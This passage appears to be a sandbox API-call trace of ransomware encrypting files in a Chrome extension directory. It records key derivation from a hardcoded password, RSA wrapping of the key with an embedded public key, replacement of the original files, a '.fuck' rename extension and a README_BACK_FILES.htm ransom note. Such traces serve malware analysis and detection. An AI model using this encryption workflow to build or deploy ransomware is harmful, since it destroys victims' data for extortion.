pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0256.610] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2e137f0) returned 1 [0256.610] CryptImportPublicKeyInfo (in: hCryptProv=0x2e137f0, dwCertEncodingType=0x1, pInfo=0x2e29540*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e29570*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e29578*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2e192e8) returned 1 [0256.610] CryptEncrypt (in: hKey=0x2e192e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0256.611] CryptEncrypt (in: hKey=0x2e192e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e14318*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2e14318*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0256.611] WriteFile (in: hFile=0x5d50, lpBuffer=0x2e14318*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2e14318*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0256.612] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.629] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.629] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.639] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x231, lpOverlapped=0x0) returned 1 [0256.639] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x231, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x240) returned 1 [0256.639] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x240, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x240, lpOverlapped=0x0) returned 1 [0256.639] CloseHandle (hObject=0x5d64) returned 1 [0256.639] CloseHandle (hObject=0x5d50) returned 1 [0256.639] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\manifest.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\manifest.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\manifest.json"), bFailIfExists=0) returned 1 [0256.642] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\manifest.json", dwFileAttributes=0x0) returned 1 [0256.643] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\manifest.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\manifest.json.gsg")) returned 1 [0256.644] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\manifest.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\manifest.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\manifest.json.fuck")) returned 1 [0256.647] CryptDestroyHash (hHash=0x2e18128) returned 1 [0256.647] CryptDestroyKey (hKey=0x2e186a8) returned 1 [0256.647] CryptReleaseContext (hProv=0x2e136e0, dwFlags=0x0) returned 1 [0256.647] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0256.647] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0256.647] GetLastError () returned 0x0 [0256.647] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\page_embed_script.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\page_embed_script.js")) returned 0x20 [0256.647] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\page_embed_script.js", dwFileAttributes=0x80) returned 1 [0256.648] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\page_embed_script.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\page_embed_script.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0256.648] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\page_embed_script.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\page_embed_script.js.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0256.649] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\page_embed_script.js.gsg", dwFileAttributes=0x2) returned 1 [0256.650] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2e13ba8) returned 1 [0256.652] CryptCreateHash (in: hProv=0x2e13ba8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0256.652] lstrlenA (lpString="hLvNwUTFLUnmKUEGuWxnlzzgzMlQm") returned 29 [0256.652] CryptHashData (hHash=0x2e186a8, pbData=0x28cb3c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0256.652] CryptDeriveKey (in: hProv=0x2e13ba8, Algid=0x6610, hBaseData=0x2e186a8, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2e18128) returned 1 [0256.652] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0256.653] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0256.653] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2e13d40) returned 1 [0256.653] CryptImportPublicKeyInfo (in: hCryptProv=0x2e13d40, dwCertEncodingType=0x1, pInfo=0x2e296e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e29710*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e29718*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2e196e8) returned 1 [0256.653] CryptEncrypt (in: hKey=0x2e196e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0256.654] CryptEncrypt (in: hKey=0x2e196e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e13a98*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2e13a98*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0256.654] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e13a98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2e13a98*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0256.655] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0xe0, lpOverlapped=0x0) returned 1 [0256.656] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0xe0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0xf0) returned 1 [0256.656] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0xf0, lpOverlapped=0x0) returned 1 [0256.656] CloseHandle (hObject=0x5d50) returned 1 [0256.657] CloseHandle (hObject=0x5d64) returned 1 [0256.657] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\page_embed_script.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\page_embed_script.js.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\page_embed_script.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\page_embed_script.js"), bFailIfExists=0) returned 1 [0256.661] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\page_embed_script.js", dwFileAttributes=0x0) returned 1 [0256.661] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\page_embed_script.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\page_embed_script.js.gsg")) returned 1 [0256.662] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\page_embed_script.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\page_embed_script.js"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\page_embed_script.js.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\page_embed_script.js.fuck")) returned 1 [0256.664] CryptDestroyHash (hHash=0x2e186a8) returned 1 [0256.664] CryptDestroyKey (hKey=0x2e18128) returned 1 [0256.664] CryptReleaseContext (hProv=0x2e13ba8, dwFlags=0x0) returned 1 [0256.664] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0256.664] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\*.*", lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0x2e186a8 [0256.670] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0256.672] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0256.673] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\af\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0256.673] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0256.673] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0256.673] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0256.673] GetLastError () returned 0x0 [0256.673] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\af\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\af\\messages.json")) returned 0x20 [0256.673] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\af\\messages.json", dwFileAttributes=0x80) returned 1 [0256.674] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\af\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\af\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0256.675] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\af\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\af\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0256.676] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\af\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0256.676] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e14180) returned 1 [0256.679] CryptCreateHash (in: hProv=0x2e14180, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0256.679] lstrlenA (lpString="hLvNwUTFLUnmKUEGuWxnlzzgzMlQm") returned 29 [0256.679] CryptHashData (hHash=0x2e18128, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0256.679] CryptDeriveKey (in: hProv=0x2e14180, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e197e8) returned 1 [0256.679] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0256.679] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0256.679] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e13ed8) returned 1 [0256.680] CryptImportPublicKeyInfo (in: hCryptProv=0x2e13ed8, dwCertEncodingType=0x1, pInfo=0x2e29880*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e298b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e298b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19668) returned 1 [0256.680] CryptEncrypt (in: hKey=0x2e19668, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0256.680] CryptEncrypt (in: hKey=0x2e19668, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e136e0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e136e0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0256.680] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e136e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e136e0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0256.681] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x84, lpOverlapped=0x0) returned 1 [0256.682] CryptEncrypt (in: hKey=0x2e197e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x84, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x90) returned 1 [0256.682] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x90, lpOverlapped=0x0) returned 1 [0256.683] CloseHandle (hObject=0x5d5c) returned 1 [0256.683] CloseHandle (hObject=0x5d60) returned 1 [0256.683] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\af\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\af\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\af\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\af\\messages.json"), bFailIfExists=0) returned 1 [0256.687] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\af\\messages.json", dwFileAttributes=0x0) returned 1 [0256.688] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\af\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\af\\messages.json.gsg")) returned 1 [0256.689] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\af\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\af\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\af\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\af\\messages.json.fuck")) returned 1 [0256.690] CryptDestroyHash (hHash=0x2e18128) returned 1 [0256.690] CryptDestroyKey (hKey=0x2e197e8) returned 1 [0256.690] CryptReleaseContext (hProv=0x2e14180, dwFlags=0x0) returned 1 [0256.690] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0256.691] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0256.691] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\af\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\af\\readme_back_files.htm")) returned 0xffffffff [0256.691] AreFileApisANSI () returned 1 [0256.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3af0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0256.691] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\af\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\af\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0256.692] GetFileType (hFile=0x5d50) returned 0x1 [0256.692] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0256.693] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0256.693] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 